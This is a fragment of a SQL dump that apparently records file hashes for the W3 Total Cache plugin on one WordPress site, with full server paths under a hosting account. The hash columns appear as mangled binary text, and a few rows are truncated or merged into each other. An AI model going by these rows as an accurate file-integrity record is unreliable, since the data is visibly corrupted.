B~','Bșo$\'AdLxRU','',0,'?'),(']Mj\ZTy20','wp-content/plugins/w3-total-cache/lib/Db/mssql.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Db/mssql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{Oc+z@wQ+7','gA\"NĠ]x͍C','',0,'?'),('|3DM','wp-content/plugins/w3-total-cache/lib/Google/Auth/Abstract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Auth/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}ʦpn/2M','EOwl_ p\rH3eJe','',0,'?'),('[Q)$,e','wp-content/plugins/w3-total-cache/lib/Google/Auth/AppIdentity.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Auth/AppIdentity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{_Ch~)JM','Psj.OXC/7eTP?_F\0','',0,'?'),('KyЀoN;','wp-content/plugins/w3-total-cache/lib/Google/Auth/AssertionCredentials.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Auth/AssertionCredentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r8.p^X\\9','va9Է\r\\JT~*X','',0,'?'),('}꧹C2IF','wp-content/plugins/w3-total-cache/lib/Google/Auth/Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Auth/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0+=tձl&','z~ oY7x\ZEf8!\rw','',0,'?'),(':\"{h!s','wp-content/plugins/w3-total-cache/lib/Google/Auth/LoginTicket.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Auth/LoginTicket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sx-CGu','PoTnrKӏXg a{+l','',0,'?'),('oO\nUv<','wp-content/plugins/w3-total-cache/lib/Google/Auth/OAuth2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Auth/OAuth2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&`6^\\#','MuC]-Ԏi#mq7vcs\'iÉ','',0,'?'),('\\noVfJ!F','wp-content/plugins/w3-total-cache/lib/Google/Auth/Simple.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Auth/Simple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I57M##3','M>VD}V\"p$9*&cbI-;','',0,'?'),('dj~џtw','wp-content/plugins/w3-total-cache/lib/Google/Cache/Abstract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Cache/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>@J#\Z\'8\00','$!hw63.h+HK+ke','',0,'?'),('+8@\'=b','wp-content/plugins/w3-total-cache/lib/Google/Cache/Apc.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Cache/Apc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mn-P]1q>TÁ','Y*}.k8-O- k(q@F','',0,'?'),('nI@sd ,茘','wp-content/plugins/w3-total-cache/lib/Google/Cache/Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Cache/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','דqvf*D/F','BE5Ob\'+ٛWi[J^O資wJ','',0,'?'),('(Y\\F*|#[l','wp-content/plugins/w3-total-cache/lib/Google/Cache/File.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DpXc#D$','Tw%bح7+~%щz?ol','',0,'?'),('V8cZ \"G','wp-content/plugins/w3-total-cache/lib/Google/Cache/Memcache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Cache/Memcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ifudakԶ ','eQ}ʽ¢^wgU= ','',0,'?'),('B(Wx؇','wp-content/plugins/w3-total-cache/lib/Google/Cache/Null.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Cache/Null.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q,vdpߩg','lƏinNyfi|YiI]','',0,'?'),('B%9KhmDw','wp-content/plugins/w3-total-cache/lib/Google/Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t G|o9Y;','͵ ?e:h\02g >;','',0,'?'),('_ Jh!jԆ','wp-content/plugins/w3-total-cache/lib/Google/Collection.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Collection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TYokD^Q -','0]=CGφw%`L7XZtӦ','',0,'?'),('%l@Y7\0','wp-content/plugins/w3-total-cache/lib/Google/Config.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','siw5Wz)6O','3*cL\\\"c&ߜJn\'9 ={#\'','',0,'?'),('nӻF$pa','wp-content/plugins/w3-total-cache/lib/Google/Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LyY@Al','7xJ̉4^\r$e(ޱazL','',0,'?'),('ʼ@W1tF~m','wp-content/plugins/w3-total-cache/lib/Google/Http/Batch.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Http/Batch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','goMlf($(_\Zrg','ߪuΨE','&bĆɯ-y`TIlѤT&VT','',0,'?'),('K8 Yd','wp-content/plugins/w3-total-cache/lib/Google/Http/MediaFileUpload.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Http/MediaFileUpload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' [[','bBACM{%qGYٖCd1','E4ab`\0)Ui(@ψ[;','',0,'?'),(' >2ÓLA','wp-content/plugins/w3-total-cache/lib/Google/Model.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Model.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' h1p]\Z4','P.Dg#yH fȬLJu','',0,'?'),('q(S(ẃu A','wp-content/plugins/w3-total-cache/lib/Google/Service/Drive.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Service/Drive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ȶUԕ#C[o','93({;hf}1\\\n Ȕہ_7@','',0,'?'),('T\\Ocp\n\"\"','wp-content/plugins/w3-total-cache/lib/Google/Service/Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Service/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Ui)vJg@\'','h߳߁dK72x-%I','',0,'?'),(':X9a\n9','wp-content/plugins/w3-total-cache/lib/Google/Service/Oauth2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Service/Oauth2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kx\0t .',' XJp}f-H)}xkM&','',0,'?'),('A :`7\"m@','wp-content/plugins/w3-total-cache/lib/Google/Service/Resource.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Service/Resource.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{5Uq+M`',';2\\vytIrt&u|pƃR$','',0,'?'),('iGAxvVK Dp','wp-content/plugins/w3-total-cache/lib/Google/Service.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ggo$(g*','xv ]+\'@Hp1Dmn#[^klZ','',0,'?'),('=1G*23\'','wp-content/plugins/w3-total-cache/lib/Google/Signer/Abstract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Signer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_\nbW^]','I\'bi*/\\r\\lQC4\\=>I','',0,'?'),('%,W{\":^T','wp-content/plugins/w3-total-cache/lib/Google/Signer/P12.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Google/Signer/P12.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','36}ϋZ^','@z\"ٌg,fcĖo)x뒎uQ','',0,'?'),('acN_)֍','',0,'?'),('E>J2, ','wp-content/plugins/w3-total-cache/lib/Minify/JSMinPlus.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/JSMinPlus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pxPw@2 b','bw^ŸQPjJ,$e&I','',0,'?'),('?ic Z9D0','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Build.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Build.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZoY&GPŽ|h','(Y:lB\04lqvQ^O','',0,'?'),(':POt.ؐ@','wp-content/plugins/w3-total-cache/lib/Minify/Minify/CSS/Compressor.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/CSS/Compressor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4V1:tHЋ','fN1vbc)b%|)ɩ‡','',0,'?'),('\\oϦSL4]?','wp-content/plugins/w3-total-cache/lib/Minify/Minify/CSS/UriRewriter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/CSS/UriRewriter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ôMh-A Lb','U0M_ΝyƢd^EpC,6X^','',0,'?'),('(OGUQE','wp-content/plugins/w3-total-cache/lib/Minify/Minify/CSS/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/CSS/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('^h4&\Z','wp-content/plugins/w3-total-cache/lib/Minify/Minify/CSS.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/CSS.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\\MiټrSv5','u,F@&mS w7','',0,'?'),('C[ݪRTkt','wp-content/plugins/w3-total-cache/lib/Minify/Minify/CSSTidy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/CSSTidy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jwd`6','> TOd -4B Smܻ$K','',0,'?'),('R>O鋡','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Cache/File.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f@-0M-7','QSN 6Y&q,W\"!\'\\','',0,'?'),('~ )@QX^','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Cache/W3TCDerived.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Cache/W3TCDerived.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TnzX{','\Z(4-1UCVQ~QV%zx','',0,'?'),('AQBx','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Cache/ZendPlatform.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Cache/ZendPlatform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V [<,7','_88-dႎ5ߠZJޠxZ7p','',0,'?'),('Jm]]љ [','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Cache/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Cache/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),(':(0\rd','wp-content/plugins/w3-total-cache/lib/Minify/Minify/ClosureCompiler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/ClosureCompiler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P(db^6<','#54z##Cq~Z%Rf','',0,'?'),('WN~HA','wp-content/plugins/w3-total-cache/lib/Minify/Minify/CombineOnly.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/CombineOnly.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r)d%ZT','>#T4j<m\ZǺn, ,','',0,'?'),('ֻ#@hmB','wp-content/plugins/w3-total-cache/lib/Minify/Minify/CommentPreserver.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/CommentPreserver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=س(Jj9K','mV/MxFc@z\\ٷ fq','',0,'?'),('d}#˦,r','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/Base.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M(NԀ|a3','$7)kS0?\"x\r Pϐ#%F','',0,'?'),('aFV2\\ƔMFW','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/Files.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/Files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n̅K}g!/','1ـr1+oہoé\rΕ6','',0,'?'),('xhT~fzce\'','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/Groups.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/Groups.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P/jH2&#','BEܽԃǹ n<> P_ ','',0,'?'),('!l.OP','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/MinApp.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/MinApp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H\ZvϨs0#','Br *TUoB}}7x伆9','',0,'?'),('␋TXמ','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';7E\'x^V`','ƴ pM5q\\t;oQන','',0,'?'),('XS-!/Pch&ʂ','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/Version1.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/Version1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}ji Kɓ','yc=I$?L\Zg/B,5W','',0,'?'),('5Hm`>ѓc','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('˟r3 Ÿ3ys','wp-content/plugins/w3-total-cache/lib/Minify/Minify/DebugDetector.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/DebugDetector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/pթugM+m','ȞGn+Y[:nN`6ʩ','',0,'?'),('o4=>Tr6V','wp-content/plugins/w3-total-cache/lib/Minify/Minify/HTML/Helper.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/HTML/Helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\m$Lx',',ōvgs\"3X_Fh+egt','',0,'?'),(' :9U­Ǯ{/','wp-content/plugins/w3-total-cache/lib/Minify/Minify/HTML.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/HTML.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+JկvON','٩r%K܏5c Y?','',0,'?'),('Yv€: v','wp-content/plugins/w3-total-cache/lib/Minify/Minify/HTMLTidy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/HTMLTidy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7AЙEY','H%yY g\rƒa ֐','',0,'?'),('Vt嫄Ii','wp-content/plugins/w3-total-cache/lib/Minify/Minify/IgnoredCommentPreserver.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/IgnoredCommentPreserver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' }m t)G','hI`\\A,ԁFHUϿ陟戹h','',0,'?'),('!c8c,A','wp-content/plugins/w3-total-cache/lib/Minify/Minify/ImportProcessor.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/ImportProcessor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':|A9h#%Y-%[O','r2IТW JI„ɝ0~S(f','',0,'?'),(' #P2-\Z','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Inline/CSS.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Inline/CSS.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&vQA@cv]M','TVM)զWqZJt}qާ','',0,'?'),('ܚ\\}K0ćņF&','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Inline/JavaScript.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Inline/JavaScript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \ngϒ','ʨ;v8qM#63;;','',0,'?'),('2rFqK9&85','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Inline/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Inline/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('-It$޿vu','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Inline.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' }l3:i~5','E=tR{T]5: mKa','',0,'?'),('p{[b  c','wp-content/plugins/w3-total-cache/lib/Minify/Minify/JS/ClosureCompiler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/JS/ClosureCompiler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x(qI,4','x>A.QB\n.ʥs|4̉?hu','',0,'?'),('!x','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Lines.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Lines.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O1\0$򉡌','XX9!Z8Ur ,mrb&V,/J','',0,'?'),('A\'`W#G','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Logger.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G4K_xN','o,Gs#g\"eV6n=dQ O ','',0,'?'),('/Ēl\n>c0','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Packer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Packer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(o >','\rǧG*hrG(u N|','',0,'?'),('1.>% /(','wp-content/plugins/w3-total-cache/lib/Minify/Minify/Source.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','% Taۥ6','OZ\ZlNocr~:10m','',0,'?'),('B2,؉cGƟ','wp-content/plugins/w3-total-cache/lib/Minify/Minify/YUI/CssCompressor.java','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/YUI/CssCompressor.java',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S[ɂ','BQd/Xez%cQp[','',0,'?'),('D;mˊ=Ѷ','wp-content/plugins/w3-total-cache/lib/Minify/Minify/YUI/CssCompressor.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/YUI/CssCompressor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٖ$4n','R5)\ZB7}%|:\'sv݉1ŀzS','',0,'?'),('b7\nUwXr','wp-content/plugins/w3-total-cache/lib/Minify/Minify/YUICompressor.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/YUICompressor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nI}v8\0d_X','o)u]9& +aJsY|U','',0,'?'),(')S2t_-duø7','wp-content/plugins/w3-total-cache/lib/Minify/Minify/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('V\"7Iߋq4j','wp-content/plugins/w3-total-cache/lib/Minify/Minify.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/Minify.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5+MsI]=','%5A{9EH CM!g:~','',0,'?'),('S f ','wp-content/plugins/w3-total-cache/lib/Minify/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Minify/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('+>\r\0\"榖$','wp-content/plugins/w3-total-cache/lib/NetDNA/NetDNA.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/NetDNA/NetDNA.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\\\"V$o@','wIS X Oͣ\Zj \\2rt','',0,'?'),('rfz','wp-content/plugins/w3-total-cache/lib/NetDNA/NetDNAPresentation.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/NetDNA/NetDNAPresentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BB,6ҹr','ehY\\icW|>|Fώd&OZx','',0,'?'),('tqysd.\\','wp-content/plugins/w3-total-cache/lib/NetDNA/W3tcWpHttpException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/NetDNA/W3tcWpHttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','تeV=1V','BW0] <;\n/QվEՉ','',0,'?'),('#$C-','wp-content/plugins/w3-total-cache/lib/NewRelic/NewRelicAPI.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/NewRelic/NewRelicAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SE4]%Iju',';M2~drDpp-\Z','',0,'?'),('Q\'I>','wp-content/plugins/w3-total-cache/lib/NewRelic/NewRelicWrapper.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/NewRelic/NewRelicWrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iB&A-,+','RUuה*2\'dk(i b6S','',0,'?'),('Z8=眕~@','wp-content/plugins/w3-total-cache/lib/Nusoap/class.nusoap_base.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Nusoap/class.nusoap_base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+l{qI(Xѳd','Cnz\'dOyޕ2N','h%\\hC)~!z\n偑','',0,'?'),('M5Og? OeN','wp-content/plugins/w3-total-cache/lib/Nusoap/class.soapclient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Nusoap/class.soapclient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@>ܽm׽KEU','g-Zú7x.Au< Cm','',0,'?'),('?jL[KALo','wp-content/plugins/w3-total-cache/lib/Nusoap/class.wsdl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Nusoap/class.wsdl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rP$ge','s2hhV ~N7饡J','',0,'?'),('ʫ&w}bDyoD^','wp-content/plugins/w3-total-cache/lib/Nusoap/class.wsdlcache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Nusoap/class.wsdlcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hc5Q4zue','GԹ7/ZEVh','',0,'?'),('EK`\0.J䱥','wp-content/plugins/w3-total-cache/lib/Nusoap/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Nusoap/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('\"iroqx R','wp-content/plugins/w3-total-cache/lib/Nusoap/nusoap.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Nusoap/nusoap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q?t\"Z,','Kzo p-ȇ;Ws','',0,'?'),('`t >l','wp-content/plugins/w3-total-cache/lib/OAuth/W3tcOAuth.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/OAuth/W3tcOAuth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','prSGj)fo','0%wo\'b0gԔG\net{EHVˣ','',0,'?'),('t_\\BLz','wp-content/plugins/w3-total-cache/lib/S3Compatible.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/S3Compatible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\0+j`ЁdAk','wp-content/plugins/w3-total-cache/lib/SNS/README.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/SNS/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^~&K1k/<','M◓>rYsi,4DH{0+','',0,'?'),(',JK;ZlϺz]\'','wp-content/plugins/w3-total-cache/lib/SNS/lib/requestcore/LICENSE','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/SNS/lib/requestcore/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pBt;3XL\0','3>c/e@/Qn7\npQY/j/','',0,'?'),('H+N\nW)һy0','wp-content/plugins/w3-total-cache/lib/SNS/lib/requestcore/README.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/SNS/lib/requestcore/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p$\05FЇЖV','|Dg:MS(B\roT','',0,'?'),('T#Ky\nV>','wp-content/plugins/w3-total-cache/lib/SNS/lib/requestcore/cacert.pem','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/SNS/lib/requestcore/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N ̨3r?F: Z','%٧N]CJ_tqgByJ','',0,'?'),(')8p\'R0<','wp-content/plugins/w3-total-cache/lib/YuiCssMin/Minifier.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/YuiCssMin/Minifier.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|xXHw,V','0czEӰ \nj','',0,'?'),('k=Rrq','wp-content/plugins/w3-total-cache/lib/YuiCssMin/Utils.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/YuiCssMin/Utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M#u 